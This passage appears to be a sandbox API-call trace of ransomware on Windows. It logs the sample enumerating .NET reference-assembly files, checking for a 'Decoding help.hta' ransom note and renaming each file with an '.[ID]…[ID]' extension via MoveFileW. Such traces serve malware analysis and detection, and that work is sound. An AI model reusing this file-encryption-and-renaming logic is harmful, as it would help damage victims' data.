"c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\system.runtime.serialization.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.717] FindNextFileW (in: hFindFile=0x5d87d0, lpFindFileData=0xfd8fd30 | out: lpFindFileData=0xfd8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9bfcf11, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa9bfcf11, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa9c6f332, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x515000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.ServiceModel.dll", cAlternateFileName="")) returned 1 [0056.717] lstrcpyW (in: lpString1=0x110fba10, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.717] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.717] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0056.717] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0056.718] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.ServiceModel.dll") returned -1 [0056.718] lstrlenW (lpString="System.ServiceModel.dll") returned 23 [0056.718] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.718] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.718] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="System.ServiceModel.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.ServiceModel.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.ServiceModel.dll" [0056.718] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.ServiceModel.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.ServiceModel.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.ServiceModel.dll" [0056.718] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.ServiceModel.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.ServiceModel.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.ServiceModel.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.718] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.ServiceModel.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\system.servicemodel.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.ServiceModel.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\system.servicemodel.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.720] FindNextFileW (in: hFindFile=0x5d87d0, lpFindFileData=0xfd8fd30 | out: lpFindFileData=0xfd8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a53bf17, ftCreationTime.dwHighDateTime=0x1ca041e, ftLastAccessTime.dwLowDateTime=0x9a53bf17, ftLastAccessTime.dwHighDateTime=0x1ca041e, ftLastWriteTime.dwLowDateTime=0x5cf16e3d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xa8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Speech.dll", cAlternateFileName="")) returned 1 [0056.720] lstrcpyW (in: lpString1=0x110fba10, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.720] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.720] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0056.720] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0056.720] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Speech.dll") returned -1 [0056.720] lstrlenW (lpString="System.Speech.dll") returned 17 [0056.720] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.720] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.720] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="System.Speech.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Speech.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Speech.dll" [0056.720] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Speech.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Speech.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Speech.dll" [0056.720] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Speech.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Speech.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Speech.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.720] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Speech.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\system.speech.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Speech.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\system.speech.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.721] FindNextFileW (in: hFindFile=0x5d87d0, lpFindFileData=0xfd8fd30 | out: lpFindFileData=0xfd8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9655ac7, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa9655ac7, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa967bc27, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x103000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Workflow.Activities.dll", cAlternateFileName="")) returned 1 [0056.721] lstrcpyW (in: lpString1=0x110fba10, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.721] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.721] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0056.721] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0056.721] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Workflow.Activities.dll") returned -1 [0056.721] lstrlenW (lpString="System.Workflow.Activities.dll") returned 30 [0056.721] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0056.721] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.721] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.721] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="System.Workflow.Activities.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Activities.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Activities.dll" [0056.721] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Activities.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Activities.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Activities.dll" [0056.721] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Activities.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Activities.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Activities.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.721] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Activities.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\system.workflow.activities.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Activities.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\system.workflow.activities.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.724] FindNextFileW (in: hFindFile=0x5d87d0, lpFindFileData=0xfd8fd30 | out: lpFindFileData=0xfd8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9609806, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa9609806, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa962f966, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x173000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Workflow.ComponentModel.dll", cAlternateFileName="")) returned 1 [0056.724] lstrcpyW (in: lpString1=0x110fba10, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.724] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.724] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0056.724] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0056.724] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Workflow.ComponentModel.dll") returned -1 [0056.724] lstrlenW (lpString="System.Workflow.ComponentModel.dll") returned 34 [0056.724] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0056.724] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.725] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.725] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="System.Workflow.ComponentModel.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.ComponentModel.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.ComponentModel.dll" [0056.725] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.ComponentModel.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.ComponentModel.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.ComponentModel.dll" [0056.725] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.ComponentModel.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.ComponentModel.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.ComponentModel.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.725] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.ComponentModel.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\system.workflow.componentmodel.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.ComponentModel.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\system.workflow.componentmodel.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.725] FindNextFileW (in: hFindFile=0x5d87d0, lpFindFileData=0xfd8fd30 | out: lpFindFileData=0xfd8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa96a1d87, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa96a1d87, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa96c7ee8, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x6f000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Workflow.Runtime.dll", cAlternateFileName="")) returned 1 [0056.725] lstrcpyW (in: lpString1=0x110fba10, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.725] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.725] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0056.725] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0056.725] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Workflow.Runtime.dll") returned -1 [0056.725] lstrlenW (lpString="System.Workflow.Runtime.dll") returned 27 [0056.725] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0056.725] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.725] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.725] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="System.Workflow.Runtime.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Runtime.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Runtime.dll" [0056.725] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Runtime.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Runtime.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Runtime.dll" [0056.725] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Runtime.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Runtime.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Runtime.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.725] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Runtime.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\system.workflow.runtime.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Runtime.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\system.workflow.runtime.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.725] FindNextFileW (in: hFindFile=0x5d87d0, lpFindFileData=0xfd8fd30 | out: lpFindFileData=0xfd8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a72b0d0, ftCreationTime.dwHighDateTime=0x1ca041e, ftLastAccessTime.dwLowDateTime=0x9a72b0d0, ftLastAccessTime.dwHighDateTime=0x1ca041e, ftLastWriteTime.dwLowDateTime=0x5cfaf3b5, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x2a000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UIAutomationClient.dll", cAlternateFileName="")) returned 1 [0056.726] lstrcpyW (in: lpString1=0x110fba10, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.726] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.726] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0056.726] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0056.726] lstrcmpiW (lpString1="Decoding help.hta", lpString2="UIAutomationClient.dll") returned -1 [0056.726] lstrlenW (lpString="UIAutomationClient.dll") returned 22 [0056.726] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.726] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.726] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="UIAutomationClient.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClient.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClient.dll" [0056.726] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClient.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClient.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClient.dll" [0056.726] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClient.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClient.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClient.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.726] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClient.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\uiautomationclient.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClient.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\uiautomationclient.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.726] FindNextFileW (in: hFindFile=0x5d87d0, lpFindFileData=0xfd8fd30 | out: lpFindFileData=0xfd8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a8f412c, ftCreationTime.dwHighDateTime=0x1ca041e, ftLastAccessTime.dwLowDateTime=0x9a8f412c, ftLastAccessTime.dwHighDateTime=0x1ca041e, ftLastWriteTime.dwLowDateTime=0x5d04792d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x5d000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UIAutomationClientsideProviders.dll", cAlternateFileName="")) returned 1 [0056.726] lstrcpyW (in: lpString1=0x110fba10, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.726] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.726] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0056.726] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0056.726] lstrcmpiW (lpString1="Decoding help.hta", lpString2="UIAutomationClientsideProviders.dll") returned -1 [0056.726] lstrlenW (lpString="UIAutomationClientsideProviders.dll") returned 35 [0056.727] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0056.727] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference 